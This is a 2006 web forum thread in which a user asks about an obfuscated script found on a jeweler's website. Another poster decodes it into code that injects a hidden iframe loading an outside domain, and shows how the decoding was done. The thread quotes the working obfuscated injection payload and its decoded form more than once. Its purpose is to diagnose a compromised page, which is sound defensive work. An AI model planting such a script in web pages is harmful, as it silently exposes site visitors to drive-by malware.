malicious script?

Discussion in 'HTML' started by Jack Mahon, Mar 27, 2006.

  1. Jack Mahon

    Jack Mahon Guest

    Hello,

    a friend visited a commercial jeweler's website and somehow got a virus
    warning on her computer ("win32/worfo").

    I checked out the site in question, but could find nothing on the home page
    code except the last line in the source code, located after the body
    end-tag.

    The line is this:
    <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2:(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

    I don't have a clue what this means. Can anyone help?

    thanks,

    Jack M
     
    Jack Mahon, Mar 27, 2006
    #1
    1. Advertising

  2. Jack Mahon

    BootNic Guest

    > "Jack Mahon" <> wrote:
    > news:viJVf.13061$%H.12433@clgrps13....
    >
    > Hello,
    >
    > a friend visited a commercial jeweler's website and somehow got a
    > virus warning on her computer ("win32/worfo").
    >
    > I checked out the site in question, but could find nothing on the
    > home page code except the last line in the source code, located
    > after the body end-tag.
    >
    > The line is this:
    > <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2:(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>
    >
    > I don't have a clue what this means. Can anyone help?



    Looks like it adds a hidden iframe.

    document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");


    --
    BootNic Monday, March 27, 2006 12:51 AM

    Have no fear of perfection - you'll never reach it.
    *Salvador Dali*
     
    BootNic, Mar 27, 2006
    #2
    1. Advertising

  3. Jack Mahon

    gerg Guest


    > Looks like it adds a hidden iframe.
    >
    > document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");
    >
    >

    How in the world did you derive that? Not doubting your ability, but it
    looked like total gibberish.

    -g-
     
    gerg, Mar 28, 2006
    #3
  4. Jack Mahon

    BootNic Guest

    > "gerg" <> wrote:
    > news:....
    >
    >>> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2:(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

    >> Looks like it adds a hidden iframe.
    >>
    >> document.write("<iframe style='display:none' width=1 height=1
    >> src='http://trust4free.ws/?id=index19'></iframe>");
    >>
    >>

    > How in the world did you derive that? Not doubting your ability,
    > but it looked like total gibberish.


    Replace eval(o); with alert(o);

    --
    BootNic Monday, March 27, 2006 9:04 PM

    "I've noticed that the press tends to be quite accurate, except when
    they're writing on a subject I know something about."
    *Keith F. Lynch*
     
    BootNic, Mar 28, 2006
    #4
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Stimp

    preventing malicious user input

    Stimp, Sep 14, 2004, in forum: ASP .Net
    Replies:
    1
    Views:
    550
  2. Replies:
    0
    Views:
    921
  3. adyda

    Malicious TAGS

    adyda, Sep 24, 2005, in forum: HTML
    Replies:
    3
    Views:
    433
    Toby Inkster
    Sep 25, 2005
  4. IRAQI OIL IS TOO PRECIOUS

    @ Friedman is a malicious mischief monger and misleader

    IRAQI OIL IS TOO PRECIOUS, May 10, 2004, in forum: C Programming
    Replies:
    2
    Views:
    379
    Christopher Benson-Manica
    May 10, 2004
  5. Danny
    Replies:
    2
    Views:
    156
    Danny
    Jul 5, 2004
Loading...

Share This Page